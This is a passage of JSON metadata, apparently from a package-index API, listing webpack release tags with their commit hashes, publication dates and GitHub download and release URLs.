odeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webp